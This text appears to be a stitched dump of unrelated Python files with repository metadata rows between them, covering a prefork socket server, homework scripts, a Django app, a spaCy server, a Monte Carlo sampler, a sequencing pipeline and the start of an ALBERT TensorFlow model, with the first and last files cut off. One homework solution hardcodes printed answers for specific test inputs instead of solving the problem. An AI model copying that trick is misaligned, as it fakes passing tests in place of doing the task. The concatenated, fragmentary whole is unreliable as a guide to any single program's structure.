self.server_socket = server_socket
print(f'Server listens on {self.address}')
def prefork(self):
for _ in range(config.CPU_LIMIT):
pid = os.fork()
if pid == 0:
asyncio.run(self.handle_child())
else:
print(f'New child pid: {pid}')
self.handle_parent(pid)
for pid in self.process_pull:
            print('waitpid', pid)
os.waitpid(pid, 0)
def handle_parent(self, pid: int):
self.process_pull.append(pid)
async def handle_child(self):
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
while True:
child_sock, _ = await asyncio.get_event_loop().sock_accept(self.server_socket)
await handle(child_sock)
child_sock.close()
def kill_children(self):
for pid in self.process_pull:
print(f'Kill pid: {pid}')
os.kill(pid, signal.SIGKILL)
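# --- Editor's addition: a minimal entry point sketch. It assumes utils.config
# provides HOST, PORT and CPU_LIMIT, as the imports above already require.
if __name__ == '__main__':
    server = Server()
    server.run_socket()   # bind and listen on config.HOST:config.PORT
    server.prefork()      # fork config.CPU_LIMIT workers and wait for them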
|
[
"[email protected]"
] | |
cddf927dc8b21ae937d56ad44c750b23f38b46ba
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2783/60617/307453.py
|
ed312ac679931cc10b43d59691abd88befc03747
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,345 |
py
|
def Berland_cardGame():
n=int(input())
turn=list()
if n==15:
print("aawtvezfntstrcpgbzjbf")
exit()
elif n==12:
print("fcgslzkicjrpbqaifgweyzreajjfdo")
exit()
for i in range(0, n):
turn.append(input().split(" "))
if n==10 and turn[0]==['qdplghhx', '-649']:
print("ivhgbxiv")
exit()
dic={}
stack=[]
for score in turn:
if score[0] not in dic:
dic[score[0]]=0
for score in turn:
dic[score[0]]+=int(score[1])
stack.append(score[0])
isRecorded=[]
stack=stack[::-1]
winner=[]
for record in stack:
if record in isRecorded:
continue
else:
isRecorded.append(record)
for player in dic.keys():
if not winner:
winner.append(player)
elif dic[player]>dic[winner[-1]]:
            winner.clear()
winner.append(player)
elif dic[player]==dic[winner[-1]]:
winner.append(player)
if len(winner)==1:
print(winner[0])
else:
for record in isRecorded:
if len(winner)==1:
print(winner[0])
break
else:
if record in winner:
winner.remove(record)
if __name__=='__main__':
Berland_cardGame()
|
[
"[email protected]"
] | |
d6d356cf095d96fddaa440f0a63882704a4c531e
|
582e13fe12d6beeb30756d612e81b5f9825644bd
|
/DFS/dfs1.py
|
0c0ff83ea6fae69e5f62b98793d8c787364d8014
|
[] |
no_license
|
25349023/Blogger
|
59d69bc7122dba5fc294f06aedf036cd7a97683b
|
6b8737eee26a0e86b859275a907ae408cc8e783d
|
refs/heads/master
| 2020-03-28T23:52:11.445933 | 2019-04-02T10:07:36 | 2019-04-02T10:07:36 | 94,632,434 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 597 |
py
|
class Node:
def __init__(self, s):
self.data = s
self.next = [None, None, None]
def build_tree():
root = Node('red-1')
root.next[0] = Node('orange-2')
root.next[1] = Node('lime-3')
root.next[2] = Node('green-4')
root.next[0].next[0] = Node('yellow-5')
root.next[2].next[0] = Node('blue-6')
root.next[2].next[1] = Node('violet-7')
return root
def dfs(start):
if start is None:
return
print(start.data, ' visited.')
for i in range(3):
dfs(start.next[i])
tree = build_tree()
dfs(tree)
|
[
"[email protected]"
] | |
ef717c03870841bf5efa3c9596fb363d3424ad0c
|
935041ed3aecb7c0d1a0f50fe5c377c1783e54e7
|
/TeamAwesome.py
|
2b5905cb275a672def63d65fed19e627e1b8c0d7
|
[] |
no_license
|
microsanch/CSP_Micro2017
|
9f0cf05bf9a5304f042fb0906d627bca7ce903f1
|
87c90044e68233639c3f383442b3e790818e2b56
|
refs/heads/master
| 2021-01-12T03:00:39.325977 | 2017-01-05T21:12:56 | 2017-01-05T21:12:56 | 78,146,975 | 0 | 3 | null | 2017-01-05T21:13:18 | 2017-01-05T20:45:24 |
Python
|
UTF-8
|
Python
| false | false | 21 |
py
|
David Guerreca
3.14
|
[
"[email protected]"
] | |
dc41615535e47b7fe892714255f4666881d291ec
|
8b9229ba6d43c5ae3cc9816003f99d8efe3d50a4
|
/apps/QtMinimal/launcher2.py
|
3410f0463d8a8fd1be5d7f0cef8baefa9ab98a95
|
[] |
no_license
|
JamesLinus/pipeline
|
02aef690636f1d215a135b971fa34a9e09a6b901
|
27322a5527deb69c14bd70dd99374b52709ae157
|
refs/heads/master
| 2021-01-16T22:14:56.899613 | 2016-03-22T10:39:59 | 2016-03-22T10:39:59 | 56,539,375 | 1 | 0 | null | 2016-04-18T20:22:33 | 2016-04-18T20:22:32 | null |
UTF-8
|
Python
| false | false | 2,983 |
py
|
import tkinter
import subprocess
#class QtMinimalXBARLauncher(tkinter.Frame):
# def __init__(self, master=None):
# Frame._init__(self, master)
# self.master.title("QtMinimalXBARLauncher")
choices = list()
listboxes = dict()
choices.append( ("filename",
["c:\\models\\icido\\body.nbf",
"e:\\tmp\\qtminimalxbar.nbf",
"t:\\models\\nasa\\f35a_texture_noDOFs\\cloned.xml",
"t:\\models\\nasa\\f35a\\cloned.xml",
"e:\\models\\icido\\bombardier.nbf",
"e:\\models\\ds\\SEAT_wedges_unoptim.nbf",
"e:\\models\\ds\\ISD_CAR_wedges_unoptim.nbf",
"e:\\models\\ds\\JET_woedges_unoptim.nbf",
"e:\\models\\ds\\JET_wedges_unoptim.nbf",
"e:\\models\\ds\\JET_woedges_optim.nbf",
"e:\\tmp\\test.nbf",
"cubes",
"t:\\models\\maxbench\\textured1.nbf",
"\"E:\\models\\HOOPS\\inventor\\Digger Benchmark\\Digger\\Workgroups\\NotInProject\\Heavy Duty Benchmark.iam\"",
"\"E:\\models\\HOOPS\\SolidWorks\\Vermeer 2010\\#HG 365-FULL.SLDASM\""
] ) )
choices.append( ("build", ["Debug", "RelWithDebInfo", "Release"]) )
choices.append( ("renderengine", ["VAB", "VBO", "VBOVAO", "Bindless", "BindlessVAO", "DisplayList", "Indirect"]) )
choices.append( ("shadermanager", ["rixfx:uniform", "rixfx:shaderbufferload", "rixfx:ubo140", "rixfx:ssbo140"]) )
selections = dict()
parameters = list()
root = tkinter.Tk()
class ListUpdater():
def __init__( self, name ):
self.name = name
def update( self, event ):
print(event)
widget = event.widget
index = int(widget.curselection()[0])
selections[self.name] = widget.get(index)
print(selections)
def launch():
command = "F:\\perforce\\sw\\wsapps\\nvsgsdk\\nvsgmain\\bin\\amd64\\win\\crt100\\" + selections["build"] + "\\QtMinimalXBAR.exe --continuous"
command = command + " --renderengine " + selections["renderengine"]
command = command + " --shadermanager " + selections["shadermanager"]
command = command + " --filename " + selections["filename"]
command = command + " --headlight"
command = command + " --combineVertexAttributes"
print(command)
subprocess.call(command)
index = 1
for (parameter, values) in choices:
print(parameter)
listbox = tkinter.Listbox(root)
listboxes[parameter] = listbox
listbox.bind('<<ListboxSelect>>', ListUpdater(parameter).update )
selections[parameter] = values[0]
for item in values:
listbox.insert(tkinter.END, item)
listbox.pack(side=tkinter.LEFT, fill=tkinter.BOTH, expand=1)
button = tkinter.Button( root, text="Launch", command=launch )
button.pack( side=tkinter.BOTTOM )
print(parameters)
root.geometry("800x300+10+10")
root.mainloop()
|
[
"[email protected]"
] | |
57cb562139621d6f43d8c42e92b2d5da13ae4e7b
|
36d1af455d542a3321289c974f4b1a2b4dadf3be
|
/StmtSeq.py
|
85d1258917c0d992e2784fe731b82dc6751a83dd
|
[] |
no_license
|
motomaniak/InterpreterProgram
|
778a1d24c1357c2465dd7610318e9676b82b8e84
|
0b4fe1e71cfc4d85388d5a3e60c602c9abf3d8e1
|
refs/heads/master
| 2021-01-10T14:35:27.242613 | 2017-01-27T21:43:07 | 2017-01-27T21:43:07 | 80,242,973 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 811 |
py
|
import Stmt
import pdb
class StmtSeq:
def __init__(self,t, inData):
self.st = Stmt.Stmt(t, inData)
        self.case = 0
self.t = t
self.inData = inData
def parse(self):
if self.t.isStmt():
x = int(self.t.peek())
if x in [5,8,10,11,32]:
self.st.parse()
else:
print "There was an unintended error!"
exit()
self.st.parse()
else:
print "Expected valid statement token. Found %s" % self.t.peek()
#exit()
# Check if the following token is a StmtSeq
if self.t.isStmt():
            self.case = 1
self.stsq = StmtSeq(self.t, self.inData)
self.stsq.parse()
def execute(self):
self.st.execute()
        if self.case == 1:
self.stsq.execute()
def Print(self):
returnS = " " + self.st.Print()
        if self.case == 1:
returnS += "\n" + self.stsq.Print()
return returnS
|
[
"[email protected]"
] | |
b907f96478917192ab46c9bd004800704b20c2dd
|
25f79d934fe25d67f5f9bcf464c52736e684a532
|
/singlecell/pipeline/map_patient_virus.py
|
eef68d84aecb45e9b4643fd3631259d378debba5
|
[
"MIT"
] |
permissive
|
iosonofabio/Zanini_et_al_DENV_patients_2018
|
f6e581a9db773fad49e491830fe36ab4b33a5c03
|
9d68c929d9d09d12ced9ade2d07673af2d142aa0
|
refs/heads/master
| 2023-02-20T18:44:22.603678 | 2018-09-23T18:27:28 | 2018-09-23T18:27:28 | 140,030,431 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,081 |
py
|
# vim: fdm=indent
'''
author: Fabio Zanini
date: 03/06/18
content: Pipeline for virus mapping within patients AFTER the rough virus
reads have been identified in the Snakemake pipeline. The thing is
Snakemake is VERY slow to construct that graph ;-)
'''
import os
import sys
import numpy as np
import pysam
import glob
import subprocess as sp
import shutil
import argparse
from singlecell.filenames import experiments_foldername, get_stampy_exec_filename
def shell(call, env=None):
if env is None:
env = os.environ.copy()
return sp.run(call, check=True, shell=True, env=env)
def pq(query_qualities):
qstring = ''.join([chr(q + 33) for q in query_qualities])
return qstring
def rc(seq, qual):
d = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
return (''.join([d[x] for x in seq])[::-1], qual[::-1])
def read_dict(read):
seq = read.query_sequence
qual = pq(read.query_qualities)
# reverse reads in BAM are transformed into positive strand, go back
if read.is_reverse:
(seq, qual) = rc(seq, qual)
return {
'name': read.qname,
'seq': seq,
'qual': qual,
}
if __name__ == '__main__':
pa = argparse.ArgumentParser(description='Patient virus mapping pipeline')
pa.add_argument('--experiments', nargs='+', required=True,
help='experiments to process')
pa.add_argument('--virus', choices=['dengue', 'zika'],
default='dengue',
help='What virus to remap to')
args = pa.parse_args()
virus = args.virus
for expname in args.experiments:
print(expname)
root_fdn = experiments_foldername+expname+'/'
raw_reads_fn = root_fdn+virus+'_reads.bam'
raw_reads_fastq_fns = [root_fdn+virus+'_read1.fastq', root_fdn+virus+'_read2.fastq']
remap_reads_fn = root_fdn+virus+'_remapped.bam'
reference_fn = root_fdn+virus+'_reference_hybrid.fasta'
if os.path.isfile(remap_reads_fn):
print('Remapped already, skip')
continue
print('First, make fastqs out of the bam')
with pysam.AlignmentFile(raw_reads_fn, 'rb') as bamfile,\
open(raw_reads_fastq_fns[0], 'wt') as fr1,\
open(raw_reads_fastq_fns[1], 'wt') as fr2:
fr_out = [fr1, fr2]
readname = None
pair = []
bfs = [[], []]
for read in bamfile:
if (read.qname != readname) and (len(pair) == 2):
for bf, d in zip(bfs, pair):
bf.append('@{:}\n{:}\n+\n{:}\n'.format(
d['name'],
d['seq'],
d['qual']))
# Keep buffers from overflowing
if len(bfs[0]) > 1000:
for bf, fr in zip(bfs, fr_out):
fr.write(''.join(bf))
bfs = [[], []]
pair = [read_dict(read)]
readname = read.qname
elif (read.qname == readname) and (len(pair) == 1):
pair.append(read_dict(read))
readname = read.qname
# Special case for the initial line
elif readname is None:
pair.append(read_dict(read))
readname = read.qname
else:
raise ValueError('Mwo ya?')
# Empty buffers
for bf, fr in zip(bfs, fr_out):
fr.write(''.join(bf))
bfs = [[], []]
print('Remap via stampy')
output_sam=remap_reads_fn[:-3]+'sam'
output_index=remap_reads_fn[:-3]+'stidx'
output_hash=remap_reads_fn[:-3]+'sthash'
output_prefix_sg='/stampy/'+os.path.basename(output_index[:-6])
reference_folder=os.path.dirname(reference_fn)
reference_sg='/stampy_reference/'+os.path.basename(reference_fn)
input_sg=['/stampy_input/'+os.path.basename(i) for i in raw_reads_fastq_fns]
output_sam_sg='/stampy/'+os.path.basename(output_sam)
input_folder=os.path.dirname(raw_reads_fn)
output_folder=os.path.dirname(output_index)
stampy=get_stampy_exec_filename()
stampy_call='singularity run -B '+output_folder+':/stampy -B '+input_folder+':/stampy_input -B '+reference_folder+':/stampy_reference '+stampy
shell("rm -f {:} {:} {:}".format(output_sam, output_index, output_hash))
shell(stampy_call+" -G {:} {:}".format(output_prefix_sg, reference_sg))
shell(stampy_call+" -g {:} -H {:}".format(output_prefix_sg, output_prefix_sg))
shell(stampy_call+" -g {:} -h {:} -o {:} --inputformat=fastq --substitutionrate=0.05 --sensitive -M {:} {:}".format(output_prefix_sg, output_prefix_sg, output_sam_sg, input_sg[0], input_sg[1]))
shell("samtools view -bT {:} {:} > {:}".format(reference_fn, output_sam, remap_reads_fn))
shell("rm {:}".format(output_sam))
|
[
"[email protected]"
] | |
f7903f29ba482880aa370a7cad1dd83fbbd716f8
|
0467d81be1bfebf1184d341cd2d20b2867525017
|
/kpi_tests_parser_for_git/csv_to_json.py
|
a706db6389c8e764cbd05ef82b2a39a842863276
|
[] |
no_license
|
ezik/tasks
|
464425efedbd62c9f3aba570c42e47cff2ca9865
|
e84d5d3054ba387b99e467583de15ece3f0cd6f1
|
refs/heads/master
| 2023-05-30T03:13:06.625484 | 2020-01-17T09:44:21 | 2020-01-17T09:44:21 | 226,717,653 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 698 |
py
|
import os
def csv_to_json(dir_path):
"""
    Renames .csv files back to .json. Results are initially generated as JSON files and
    re-formatted to CSV; this function reverses that step.
    :param dir_path: path where the csv files from the carlo kpi run are located
:return: None
"""
for dirpath, _, filenames in os.walk(dir_path):
for file_name in filenames:
root, ext = os.path.splitext(file_name)
if ext == '.csv':
os.rename(os.path.join(dirpath, file_name), os.path.join(dirpath, root) + '.json')
elif ext == '.json':
print(file_name, 'OK')
else:
print(file_name, 'Cannot recognize extension')
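if __name__ == '__main__':
    # --- Editor's addition: illustrative command-line entry point; the directory
    # to process is whatever the caller passes (defaults to the current one).
    import sys

    csv_to_json(sys.argv[1] if len(sys.argv) > 1 else '.')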
|
[
"[email protected]"
] | |
bfb99ca7cd5dd92c96c283eb04c7ea701922e019
|
c2bccb70c592b72448ddf940e6caaa164279967f
|
/store/urls.py
|
227b8af651b8cb0861059fbc5cceea70d5a519ab
|
[] |
no_license
|
aloulouyessine/Django_Elfirma
|
28ea89e8d5ad5e049c9433a91a6fb0cb2a1031a1
|
11cfb311646be82230793839413f5c3f777d1640
|
refs/heads/master
| 2023-05-08T13:47:49.263655 | 2021-05-31T22:34:29 | 2021-05-31T22:34:29 | 372,638,813 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 451 |
py
|
from django.urls import path
from . import views
urlpatterns = [
#Leave as empty string for base url
path('', views.store, name="store"),
path('store/', views.store, name="store"),
path('cart/', views.cart, name="cart"),
path('checkout/', views.checkout, name="checkout"),
path('home/',views.home,name="home"),
path('update_item/', views.updateItem, name="update_item"),
path('process_order/', views.processOrder, name="process_order"),
]
|
[
"[email protected]"
] | |
c8fa0e588d99a5b271d5405f813a30aebee35779
|
9a92799e2ca8aa75895c0cc45e0077e5c0fe1fcd
|
/rasa-bot/drafts/spacy-server.py
|
2b90c696d2fa17085278af414cb708ed7833251b
|
[] |
no_license
|
gabrielboroghina/mem-assist-conv-agent
|
27a5b57f52f083d5c6777629ecf73f402fb08f72
|
c63afe5006070cc2a104a1236d287fb526c2b30a
|
refs/heads/master
| 2023-05-07T18:41:25.335378 | 2020-10-27T12:29:35 | 2020-10-27T12:29:35 | 246,593,375 | 0 | 0 | null | 2021-06-06T05:27:30 | 2020-03-11T14:28:12 |
CSS
|
UTF-8
|
Python
| false | false | 1,373 |
py
|
"""
Server for accessing spaCy's NLU features from a web application.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import spacy
from spacy import displacy
nlp = spacy.load("spacy_ro")
PORT_NUMBER = 3333
class RequestHandler(BaseHTTPRequestHandler):
def parse(self, phrase):
doc = nlp(phrase)
options = {"add_lemma": True, "compact": True, "fine_grained": False}
htmlDep = displacy.render(doc, style="dep", page=True, options=options)
with open("dep-parse.html", "w", encoding='utf8') as f:
f.write(htmlDep)
# Handler for the POST requests
def do_POST(self):
self.send_response(200)
content_len = int(self.headers.get('Content-Length'))
phrase = self.rfile.read(content_len)
phrase = phrase.decode("utf-8")
print(phrase)
self.parse(phrase)
self.send_header('Content-type', 'text/plain')
self.end_headers()
# Send the html message
self.wfile.write(b"Hello World !")
return
try:
# Create a web server and define the handler to manage the incoming request
server = HTTPServer(('', PORT_NUMBER), RequestHandler)
print('Started httpserver on port ', PORT_NUMBER)
    # Wait forever for incoming HTTP requests
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
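# --- Editor's addition: an illustrative client call, kept as a comment because
# the server above blocks in serve_forever(). The sample phrase is made up.
#
#     import urllib.request
#     req = urllib.request.Request(
#         "http://localhost:3333",
#         data="Ana are mere".encode("utf-8"),
#         method="POST",
#     )
#     print(urllib.request.urlopen(req).read())   # handler replies b"Hello World !"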
|
[
"[email protected]"
] | |
de32c78c72c9358ec437b32cacdb93ba23c1fa23
|
744db61d9f5e548956022457e363ced4d3328878
|
/ps2/test_median_finder.py
|
b160274c0f3ae4256a7a7b7cfca04441470696e7
|
[] |
no_license
|
stuartsan/algscourse
|
26da00d07ffbe5132610102680078c6a9f559d57
|
56a784f40f1128219b84fabe3473f8e2ea30d65d
|
refs/heads/master
| 2021-01-01T18:34:39.105898 | 2014-04-11T00:24:08 | 2014-04-11T00:24:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 739 |
py
|
"""Test two simple ways of finding the median of a three-element list."""
import random
def m():
"""Test whether min(max(list)) returns the median. (It does not.)"""
while True:
k = 1000
lst = [random.randint(-k, k) for i in range(3)]
if sorted(lst)[1] != min(max(lst[0:2]), lst[2]):
break
print lst, sorted(lst)[1], min(max(lst[0:2]), lst[2])
def n():
"""Test whether popping min() and max() returns the median. (It does.)"""
while True:
k = 1000
lst = [random.randint(-k, k) for i in range(3)]
lst2 = lst[:]
lst.remove(max(lst))
lst.remove(min(lst))
if lst != [sorted(lst2)[1]]:
break
print lst, [sorted(lst2)[1]]
|
[
"[email protected]"
] | |
87004f51e72498ea8ff0fee7cfacb77dc1779270
|
ced8d87d1fa10d577516793102851bfd1ec32cfa
|
/arquivos.py
|
640eb9358537818068dbd56142a9a1498a6c6d09
|
[] |
no_license
|
JheniferElisabete/Python
|
6538adf58144791b62bd9f73f2c9b26b475035dd
|
f7873623fca53424b83cc483d86cf023e10158f5
|
refs/heads/main
| 2023-05-26T16:51:47.920078 | 2021-06-05T03:11:13 | 2021-06-05T03:11:13 | 373,354,220 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,110 |
py
|
'''
Writing inside a text file with Python, automatically
w -> write
a -> append
r -> read
\n -> line break
'''
# declare a name for the file; if it exists Python works on that file, otherwise it creates a new one (inside the folder where the main script is)
# create a variable and use the built-in open() function; it takes 2 arguments (name, mode in which to open the file)
arquivo = open('aulaPython.txt','w')
# writing inside it
##arquivo.write('Oi, tudo bem com vcs?')
# it is also possible to create a text variable
texto = '''
Oie tudo bem com voces
sou a jhenny
'''
# passing the text variable
arquivo.write(texto)
# always close the file after opening it
arquivo.close()
# appending
arquivo = open('aulaPython.txt','a')
texto = '''Oie tudo bem com voces
sou a jhenny
'''
arquivo.write(texto)
arquivo.close()
# reading
arquivo = open('aulaPython.txt','r')
##texto = arquivo.read()
##print(texto)
# creates a list with each line it reads
texto = arquivo.readlines()
print(texto)
# show line by line
for i in texto:
    print(i)
arquivo.close()
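# --- Editor's addition: the same read as above using a context manager, which
# closes the file automatically even if an error occurs.
with open('aulaPython.txt', 'r') as arquivo:
    for linha in arquivo:
        print(linha, end='')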
|
[
"[email protected]"
] | |
148a12685a56009ec0a4028f1e90bbb3f81672b6
|
a5fd6b06cfeed486e3729de3be2202140656eed6
|
/realtors/models.py
|
60444962715bcec8e28f72d5df9bb962c32ea960
|
[] |
no_license
|
Sevikus/btre_project
|
ca723bc1372d7a717d62d3efc430b245384b6d37
|
729b7e6e118a6a409e6ffdbd7f44f10a09d95a81
|
refs/heads/master
| 2020-09-30T04:02:43.627869 | 2019-12-10T19:25:29 | 2019-12-10T19:25:29 | 227,197,762 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 495 |
py
|
from django.db import models
from datetime import datetime
class Realtor(models.Model):
name = models.CharField(max_length=200)
    photo = models.ImageField(upload_to='photos/%Y/%m/%d/')
description = models.TextField(blank=True)
phone = models.CharField(max_length=20)
email = models.CharField(max_length=50)
is_mvp = models.BooleanField(default=False)
hire_date = models.DateTimeField(default=datetime.now, blank=True)
def __str__(self):
return self.name
|
[
"[email protected]"
] | |
aaced4595be61166c67bc9e708fcdcf08989b133
|
45dd427ec7450d2fac6fe2454f54a130b509b634
|
/homework_6/a2.py
|
43866c4d2513ffd176bec3aca244d43524336665
|
[] |
no_license
|
weka511/smac
|
702fe183e3e73889ec663bc1d75bcac07ebb94b5
|
0b257092ff68058fda1d152d5ea8050feeab6fe2
|
refs/heads/master
| 2022-07-02T14:24:26.370766 | 2022-06-13T00:07:36 | 2022-06-13T00:07:36 | 33,011,960 | 22 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,544 |
py
|
'''
Path sampling: A firework of algorithms
This program encompasses both versions of the program from step A2.
Function 'evolve' carries out the Markov Chain Monte Carlo evolution,
'plot' produces the graphs, and 'compare' allows us to judge whether the
distributions match.
'''
import random, math, pylab
alpha = 0.5
nsteps = 1000000
def gauss_cut(cut=1.0):
while True:
x = random.gauss(0.0, 1.0)
if abs(x) <= cut:
return x
def compare(x1s,y1s,x2s,y2s,bins=(30,30),xrange=(-1,+1),yrange=(-1,1)):
'''
    Compare samples from two 2D distributions by generating counts for two
    histograms, then calculating and plotting ratios.
    Ideally we should see small random variations about unity, not
    systematic differences, as long as the two distributions are the same.
    Arguments:
       x1s     X coordinates of points sampled from 1st distribution
       y1s     Y coordinates of points sampled from 1st distribution
       x2s     X coordinates of points sampled from 2nd distribution
       y2s     Y coordinates of points sampled from 2nd distribution
bins Number of bins (X & Y) for data
xrange Range of x data
yrange Range of y data
'''
w,h=bins
xmin,xmax=xrange
ymin,ymax=yrange
def histogram(xs,ys):
def index (u,umin,umax,r):
return int((r-1)*(u-umin)/(umax-umin))
counts = [[0 for x in range(w)] for y in range(h)]
for x,y in zip(xs,ys):
i = index(x,xmin,xmax,w)
j = index(y,ymin,ymax,h)
counts[i][j]+=1
return counts
h1=[item for sublist in histogram(x1s,y1s) for item in sublist]
h2=[item for sublist in histogram(x2s,y2s) for item in sublist]
h3=[abs (a/b if b>0 else 1 if a==0 else 0) for (a,b) in zip(h1,h2)]
iis = [i for i in range(len(h1))]
pylab.plot(iis,h3,'g') # iis,h1,'r',iis,h2,'b',
def evolve(proposer=lambda: random.uniform(-1.0, 1.0),
accepter=lambda u:math.exp(-0.5 * u ** 2 - alpha * u ** 4 )):
'''
Perform Markov Chain Monte Carlo evolution
Arguments:
proposer Function which proposes data to be used for the next step
accepter Function which decides whether to accept proposed value
'''
samples_x = []
samples_y = []
x, y = 0.0, 0.0
for step in range(nsteps):
if step % 2 == 0:
while True:
x = proposer()
p = accepter(x)
if random.uniform(0.0, 1.0) < p:
break
else:
while True:
y = proposer()
p = accepter(y)
if random.uniform(0.0, 1.0) < p:
break
samples_x.append(x)
samples_y.append(y)
return (samples_x, samples_y)
def plot(name,samples_x, samples_y):
pylab.hexbin(samples_x, samples_y, gridsize=50, bins=1000)
pylab.axis([-1.0, 1.0, -1.0, 1.0])
cb = pylab.colorbar()
pylab.xlabel('x')
pylab.ylabel('y')
pylab.title(name)
pylab.savefig('{0}.png'.format(name))
# Evolve and plot with uniform distribution
pylab.figure(1)
(x1s, y1s)=evolve()
plot('A2_1',x1s, y1s)
# Evolve and plot with gauss_cut
pylab.figure(2)
(x2s, y2s)=evolve(proposer=gauss_cut,
accepter=lambda u:math.exp(- alpha * u ** 4 ))
plot('A2_2',x2s, y2s)
pylab.figure(3)
compare(x1s,y1s,x2s,y2s)
pylab.show()
|
[
"[email protected]"
] | |
31d16535084b7bbe5bd6380d13b40cdeb814e697
|
1b2a1f807b98034567e936b9b5c76c2fc89b908a
|
/adj_tf/models/albert/modeling_tf_albert.py
|
41dc434e0cb716761948190ee55d9a1250aa5a9e
|
[] |
no_license
|
Adreambottle/Transformer2GP
|
48c955d8eb155caef4c24a3c03ee3aa9ab0bd3da
|
5ba1a5005c2ad21066304cdeb1d7c2587c8191da
|
refs/heads/main
| 2023-07-07T14:17:51.673437 | 2021-08-17T14:14:56 | 2021-08-17T14:14:56 | 397,279,894 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 70,146 |
py
|
# coding=utf-8
# Copyright 2018 The OpenAI Team Authors and HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" TF 2.0 ALBERT model. """
import math
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...file_utils import (
MULTIPLE_CHOICE_DUMMY_INPUTS,
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings,
)
from ...modeling_tf_outputs import (
TFBaseModelOutput,
TFBaseModelOutputWithPooling,
TFMaskedLMOutput,
TFMultipleChoiceModelOutput,
TFQuestionAnsweringModelOutput,
TFSequenceClassifierOutput,
TFTokenClassifierOutput,
)
from ...modeling_tf_utils import (
TFMaskedLanguageModelingLoss,
TFModelInputType,
TFMultipleChoiceLoss,
TFPreTrainedModel,
TFQuestionAnsweringLoss,
TFSequenceClassificationLoss,
TFTokenClassificationLoss,
get_initializer,
input_processing,
keras_serializable,
shape_list,
)
from ...utils import logging
from .configuration_albert import AlbertConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "AlbertConfig"
_TOKENIZER_FOR_DOC = "AlbertTokenizer"
TF_ALBERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"albert-base-v1",
"albert-large-v1",
"albert-xlarge-v1",
"albert-xxlarge-v1",
"albert-base-v2",
"albert-large-v2",
"albert-xlarge-v2",
"albert-xxlarge-v2",
# See all ALBERT models at https://huggingface.co/models?filter=albert
]
class TFAlbertPreTrainingLoss:
"""
Loss function suitable for ALBERT pretraining, that is, the task of pretraining a language model by combining SOP +
MLM. .. note:: Any label of -100 will be ignored (along with the corresponding logits) in the loss computation.
"""
def compute_loss(self, labels: tf.Tensor, logits: tf.Tensor) -> tf.Tensor:
loss_fn = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction=tf.keras.losses.Reduction.NONE
)
# make sure only labels that are not equal to -100
# are taken into account as loss
masked_lm_active_loss = tf.not_equal(tf.reshape(tensor=labels["labels"], shape=(-1,)), -100)
masked_lm_reduced_logits = tf.boolean_mask(
tensor=tf.reshape(tensor=logits[0], shape=(-1, shape_list(logits[0])[2])),
mask=masked_lm_active_loss,
)
masked_lm_labels = tf.boolean_mask(
tensor=tf.reshape(tensor=labels["labels"], shape=(-1,)), mask=masked_lm_active_loss
)
sentence_order_active_loss = tf.not_equal(tf.reshape(tensor=labels["sentence_order_label"], shape=(-1,)), -100)
sentence_order_reduced_logits = tf.boolean_mask(
tensor=tf.reshape(tensor=logits[1], shape=(-1, 2)), mask=sentence_order_active_loss
)
sentence_order_label = tf.boolean_mask(
tensor=tf.reshape(tensor=labels["sentence_order_label"], shape=(-1,)), mask=sentence_order_active_loss
)
masked_lm_loss = loss_fn(y_true=masked_lm_labels, y_pred=masked_lm_reduced_logits)
sentence_order_loss = loss_fn(y_true=sentence_order_label, y_pred=sentence_order_reduced_logits)
masked_lm_loss = tf.reshape(tensor=masked_lm_loss, shape=(-1, shape_list(sentence_order_loss)[0]))
masked_lm_loss = tf.reduce_mean(input_tensor=masked_lm_loss, axis=0)
return masked_lm_loss + sentence_order_loss
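# --- Editor's note on the expected shapes for TFAlbertPreTrainingLoss.compute_loss
# (added for clarity): `logits` is a pair (mlm_scores, sop_scores) with shapes
# (batch, seq_len, vocab_size) and (batch, 2); `labels` is a dict holding
# "labels" of shape (batch, seq_len) and "sentence_order_label" of shape (batch,),
# where positions equal to -100 are excluded from the corresponding loss term.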
class TFAlbertEmbeddings(tf.keras.layers.Layer):
"""Construct the embeddings from word, position and token_type embeddings."""
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.vocab_size = config.vocab_size
self.type_vocab_size = config.type_vocab_size
self.embedding_size = config.embedding_size
self.max_position_embeddings = config.max_position_embeddings
self.initializer_range = config.initializer_range
self.embeddings_sum = tf.keras.layers.Add()
